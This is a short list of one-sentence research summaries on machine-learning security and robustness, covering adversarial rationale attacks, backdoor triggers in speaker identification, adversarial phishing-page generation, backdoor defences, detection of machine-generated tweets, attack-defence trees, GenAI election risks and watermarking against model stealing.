Existing rationalization models are vulnerable to adversarial attacks that can significantly change the selected rationales while maintaining model predictions, undermining the credibility of these models.
Emotional prosody can be effectively used as a backdoor trigger to compromise the integrity of speaker identification deep neural networks.
PhishOracle, a tool that generates adversarial phishing webpages by embedding diverse content-based and visual-based phishing features into legitimate webpages, can be used to evaluate the robustness of existing phishing webpage detection models.
The training process of foundation models can be interpreted as a form of data compression, where the model's weights represent a compressed version of the training data. This perspective has significant implications for understanding the copyright status of the model weights and the outputs generated by the model.
A novel defense mechanism that leverages density-based clustering and iterative scoring to effectively mitigate clean-label backdoor attacks on machine learning models used in cybersecurity applications, without requiring access to clean training data or knowledge of the victim model architecture.
Censorship and domain adaptation significantly undermine the effectiveness of automated detection methods in identifying machine-generated tweets.
Quantitative analysis of attack-defense trees can distinguish likely from unlikely vulnerabilities by utilizing information such as probabilities, costs, and timing. This paper presents a tool, QuADTool, that allows for easy synthesis and analysis of attack-defense tree models, including support for probabilities, costs, and time. The tool also provides interfaces to existing model checkers and analysis tools.
제너레이티브 인공지능(GenAI)과 대규모 언어 모델(LLM)은 온라인 선거 개입을 위한 심각한 위험을 초래할 수 있다.
Generative Artificial Intelligence (GenAI) and Large Language Models (LLMs) present significant risks for online election interference, enabling sophisticated forms of manipulation and disinformation that can disrupt democratic processes.
A novel probabilistic approach for enhancing the robustness of trigger set-based watermarking techniques against model stealing attacks.